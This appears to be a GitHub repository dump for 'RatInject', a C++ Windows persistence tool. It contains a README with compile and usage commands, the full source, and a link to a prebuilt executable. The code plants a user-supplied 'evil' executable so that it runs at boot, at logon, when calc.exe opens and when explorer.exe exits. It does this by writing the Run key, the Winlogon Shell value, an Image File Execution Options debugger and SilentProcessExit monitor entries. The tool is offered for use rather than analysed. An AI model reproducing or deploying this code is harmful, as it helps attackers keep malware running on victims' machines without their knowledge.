├── README.md
├── persistence.cpp
└── ratinject.exe


/README.md:
--------------------------------------------------------------------------------
 1 | # RatInject
 2 | Rat Inject is C++ Executable to gain Undetectable Persistence in Windows via 4 Registry Keys 
 3 | 
 4 | # How Works?
 5 | 
 6 | This tool gains persistence of an executable in Windows by exploiting 4 different internal Windows registries:
 7 | 
 8 | - RunKey
 9 | - WinLogon
10 | - Image File Execution Options (Open)
11 | - Image File Execution Options (Close)
12 | 
13 | **Runkey:**
14 | 
15 | Run Register, this register are one of the most important in Windows system, this register is execute many times during operation, but especially when you start the machine.
16 | 
17 | **WinLogon:**
18 | 
19 | Winlogon is a Windows component which handles various activities such as the Logon, Logoff, loading user profile, shutdown, lock screen... This execute your exe every time than user Logon, Logoff, loading user profile during authentication, shutdown, lock screen and more...
20 | 
21 | **Image File Execution Options (Open):**
22 | 
23 | This way allow you to execute your binary when user open any defined process or binary. In this case i cexecute exe when user open calc.exe process.
24 | 
25 | **Image File Execution Options (Close):**
26 | 
27 | This way allow you to execute your binary when user close any defined process or binary. In this case i execute exe when user finish explorer.exe process.
28 | 
29 | # Compile
30 | 
31 | To compile this you need to execute this command in Linux machine:
32 | 
33 | x86_64-w64-mingw32-g++ persistence.cpp -o ratinject.exe -static-libstdc++ -static-libgcc -fpermissive
34 | 
35 | ![image](https://user-images.githubusercontent.com/79543461/204348350-3f271288-daea-4dc5-aee4-882e143802b4.png)
36 | 
37 | # Use
38 | 
39 | To use this tool you have to execute the command with its parameters as follows:
40 | 
41 | Ways:
42 | 
43 | - Winlogon
44 | - Run
45 | - Open
46 | - Close
47 | 
48 | 
49 | 
50 | Recommended:
51 | 
52 | **ratinject.exe C:\temp\shell.exe Run Open Close**
53 | 
54 | Winlogon can create bugs in OS.
55 | 
56 | 
57 | 
58 | All Ways (shell.exe is evil file to execute with persistence (absolut path)):
59 | 
60 | **ratinject.exe C:\temp\shell.exe All**
61 | 
62 | 
63 | 
64 | Only One:
65 | 
66 | **ratinject.exe C:\temp\shell.exe Winlogon/Run/Open/Close**
67 | 
68 | 
69 | 
70 | Or mix (example, you can use all possible mixes):
71 | 
72 | **ratinject.exe C:\temp\shell.exe Run Open Close**
73 | 
74 | 


--------------------------------------------------------------------------------
/persistence.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <string.h>
  3 | #include <iostream>
  4 | #include <conio.h>
  5 | 
  6 | char* tita;
  7 | const char* exe;
  8 | const char* exe2;
  9 | 
 10 | using namespace std;
 11 | 
 12 | // register run
 13 | int runkeys(const char* exe) {
 14 |     HKEY hkey = NULL;
 15 | 
 16 |     LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey);
 17 |     if (res == ERROR_SUCCESS) {
 18 |         RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
 19 |         RegCloseKey(hkey);
 20 |     }
 21 |     return 0;
 22 | }
 23 | 
 24 | //winlogon
 25 | int winlogon(const char* exe){
 26 |     HKEY hkey = NULL;
 27 |     
 28 |     LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, KEY_WRITE, &hkey);
 29 |     if (res == ERROR_SUCCESS) {
 30 |         RegSetValueEx(hkey,(LPCSTR)"Shell", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
 31 |         RegCloseKey(hkey);
 32 |     }
 33 | 
 34 |     return 0;
 35 | }
 36 | 
 37 | //execute exe when open app
 38 | int open(string exee){
 39 |     string tititi = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\calc.exe\" /v Debugger /t reg_sz /d \"cmd /C _calc.exe & " + exee + " /f";
 40 |     const char* command = tititi.c_str();
 41 |     
 42 |     system("copy C:\\Windows\\system32\\calc.exe C:\\Windows\\system32\\_calc.exe");
 43 |     system(command);
 44 |     return 0;
 45 | }
 46 | 
 47 | int close(const char* exe) {
 48 |   HKEY hkey = NULL;
 49 |   DWORD gF = 512;
 50 |   DWORD rM = 1;
 51 | 
 52 |   const char* img = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
 53 |   const char* silent = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\explorer.exe";
 54 | 
 55 |   LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL);
 56 |   if (res == ERROR_SUCCESS) {
 57 |     RegSetValueEx(hkey, (LPCSTR)"GlobalFlag", 0, REG_DWORD, (const BYTE*)&gF, sizeof(gF));
 58 |     RegCloseKey(hkey);
 59 |   }
 60 | 
 61 |   res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)silent, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL);
 62 |   if (res == ERROR_SUCCESS) {
 63 |     RegSetValueEx(hkey, (LPCSTR)"ReportingMode", 0, REG_DWORD, (const BYTE*)&rM, sizeof(rM));
 64 |     RegSetValueEx(hkey, (LPCSTR)"MonitorProcess", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
 65 |     RegCloseKey(hkey);
 66 |   }
 67 | 
 68 |   return 0;
 69 | }
 70 | 
 71 | int main (int argc, char** argv){
 72 |     exe = argv[1];
 73 |     if (argc <= 2) {
 74 |       cout<<"\n\tHelp Menu\n\tcreated by salsa\n\n\tOptions:\n\t1- Run\n\t2- Open\n\t3- Close\n\t4- WinLogon\n\t5- All\n\n\tUsage:\n\tratinject.exe evil.exe persistence-options\n\n\tRecommended Example:\n\tratinject.exe evil.exe Open Run Close\n";
 75 |     }
 76 |     for (int i = 1; i < argc; ++i) {
 77 |         if (argv[i] == string("All")) {
 78 |             runkeys(exe);
 79 |             open(exe);
 80 |             close(exe);
 81 |             winlogon(exe);
 82 |         }
 83 |         else if (argv[i] == string("Winlogon") || argv[i] == string("winlogon")) {
 84 |             cout<<"Executing WinLogon Persistence...";
 85 |             winlogon(exe);
 86 |         }
 87 |         else if (argv[i] == string("Open") || argv[i] == string("open")) {
 88 |             cout<<"Executing Image Options Persistence...";
 89 |             open(exe);
 90 |         }
 91 |         else if (argv[i] == string("Close") || argv[i] == string("close")) {
 92 |             cout<<"Executing Image Options Persistence...";
 93 |             close(exe);
 94 |         }
 95 |         else if (argv[i] == string("Run") || argv[i] == string("run")) {
 96 |             cout<<"Executing Runkeys Persistence...";
 97 |             runkeys(exe);
 98 |         }
 99 |     }
100 |     return 0;
101 | }
102 | 


--------------------------------------------------------------------------------
/ratinject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S12cybersecurity/RatInject/dbcebd4ee35b0fd57ce3835237168a9d13d5ad10/ratinject.exe


--------------------------------------------------------------------------------